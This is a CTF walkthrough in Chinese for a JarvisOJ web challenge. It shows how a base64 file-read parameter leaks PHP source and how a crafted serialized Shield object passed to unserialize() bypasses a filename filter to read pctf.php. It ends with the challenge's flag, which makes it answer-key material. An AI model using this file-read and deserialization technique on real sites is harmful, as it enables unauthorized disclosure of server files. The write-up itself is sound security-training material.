[JarvisOj](Web)神盾局的秘密

题目链接：

这里有个通向神盾局内部网络的秘密入口，你能通过漏洞发现神盾局的秘密吗？
题目入口：http://web.jarvisoj.com:32768/

分析：
打开题目提供网站 : 发现是一张图占据了页面的大部分位置 :
查看源码如下 :

Paste_Image.png

发现了关键的地方 :

showimg.php?img=c2hpZWxkLmpwZw==

点击后 , 如下图所示 :

Paste_Image.png

很显然 , 这个参数是被Base64编码过后的 , 而且这个漏洞显然是PHP的文件包含漏洞 , 将服务器上别的文件的文件名进行Base64加密 , 然后传递进去 , 也会打印出文件的内容 , 首先打印showimg.php : (注意要在查看源码中进行查看)

<?php
    $f = $_GET['img'];
    if (!empty($f)) {
        $f = base64_decode($f);
        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
        && stripos($f,'pctf')===FALSE) {
            readfile($f);
        } else {
            echo "File not found!";
        }
    }
?>

然后继续利用这个漏洞 , 可以查看 index.php 的源码 :

<?php 
    require_once('shield.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>

在 index.php 中 , 我们可以了解到 :

1. index.php require_once 了 shield.php
2. index.php 可以GET传递一个名为 class 的参数
3. 得到class这个参数后 , 会将这个参数反序列化

然后 , 我们继续读取 shield.php 的内容 :

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
        
        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

然后我们在这个文件里面发现了注释 : "//flag is in pctf.php"
继续修改img的值为"pctf.php"的Base64值 : cGN0Zi5waHA=
读取 pctf.php , 但是这次显示为 :

Paste_Image.png

重新审计代码 , 发现在 showimg.php 对img的Base64解码结果是否包含了 "pctf" 这个字符串 进行了判断 , 因此我们就不可以在通过参数传递文件名来读取 pctf.php 的文件内容了 , 但是在 index.php 中 , 这个php又可以接收一个class的参数 , 通过这个参数反序列化来创建一个shield对象 , 然后再调用这个shield对象的readfile方法
这样的话 , 也就是说我们可以构造一个反序列化后 , $file = 'ctfp.php' 的参数

这样我们就需要对 php 的序列化和反序列化的机制有一定的了解 , 或者如果本地拥有 php 的运行环境的话 , 就可以在本地构建一个我们需要的 shield 的对象 , 然后将它序列化后输出 , 得到的字符串就是我们需要的 class 参数的值

本地测试 php 代码为 :

<?php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }

        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }

    $shield = new Shield('pctf.php');
    echo serialize($shield);
?>

本地运行结果为 :

Paste_Image.png

将echo出来的结果赋值 , GET传入class这个变量

Paste_Image.png

在页面的源码中可以得到flag

Paste_Image.png

答案：
PCTF{W3lcome_To_Shi3ld_secret_Ar3a}

知识点：

1. php文件包含漏洞
2. php序列化/反序列化
3. Base64编码